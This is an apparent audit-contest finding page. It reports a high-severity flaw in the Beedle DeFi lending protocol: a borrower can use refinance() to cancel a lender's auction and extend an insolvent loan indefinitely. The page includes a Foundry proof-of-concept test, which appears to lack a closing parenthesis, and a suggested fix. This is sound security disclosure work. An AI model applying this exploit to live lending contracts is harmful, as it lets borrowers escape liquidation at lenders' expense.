Beedle - Oracle free perpetual lending

BeedleFi

DeFiFoundry

20,000 USDC

View results

Previous Next

Submission Details

Severity: high

Valid

Borrower can use Refinance to cancel auctions so they can extend their loan indefinitely

BanditSecurity

Summary

When the lender auctions their loan, the borrower can call refinance() into a pool which has exactly the same specifications as the previous pool, and then immediately giveLoan() or refinance back into the original pool. This cancels the auction and allows the borrower to extend their loan indefinitely even if it is insolvent.

Vulnerability Details

Here is a POC that Refinance resets loan time. The auction is initiated through:

lender.startAuction(loanIds);

So the auction should end 1 day from the current block.timestamp. Then it is refinanced.

If refinance resets the auction timestamp, startAuctionTimestamp will be reset to type(uint256).max:

assertEq(auctionTimestamp, type(uint256).max);

This test passes so the proof/attack was successful

function test_refinance_during_auction() public {

test_borrow();

vm.startPrank(lender2);

Pool memory p = Pool({

lender: lender2,

loanToken: address(loanToken),

collateralToken: address(collateralToken),

minLoanSize: 100*10**18,

poolBalance: 1000*10**18,

maxLoanRatio: 2*10**18,

auctionLength: 1 days,

interestRate: 1000,

outstandingLoans: 0

});

lender.setPool(p);

vm.startPrank(lender1);

uint256[] memory loanIds = new uint256[](1);

loanIds[0] = 0;

//start auction is called

lender.startAuction(loanIds);

vm.startPrank(borrower);

Refinance memory r = Refinance({

loanId: 0,

poolId: keccak256(

abi.encode(

address(lender2),

address(loanToken),

address(collateralToken)

)

debt: 100*10**18,

collateral: 100*10**18

});

Refinance[] memory rs = new Refinance[](1);

rs[0] = r;

lender.refinance(rs);

(,,,,,,,,uint auctionTimestamp,) = lender.loans(0);

//assert that auction timestamp has reset

assertEq(auctionTimestamp, type(uint256).max);

}

Impact

Borrower can extend their loan forever without being seized

Tools Used

Foundry

Recommendations

Do not reset the auctions starting time when refinance is called.

Prize pool breakdown

Total prize

20,000 USDC

nSLOC

706

28 USDC / LOC

High Medium

18,000 USDC

Low

2,000 USDC

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.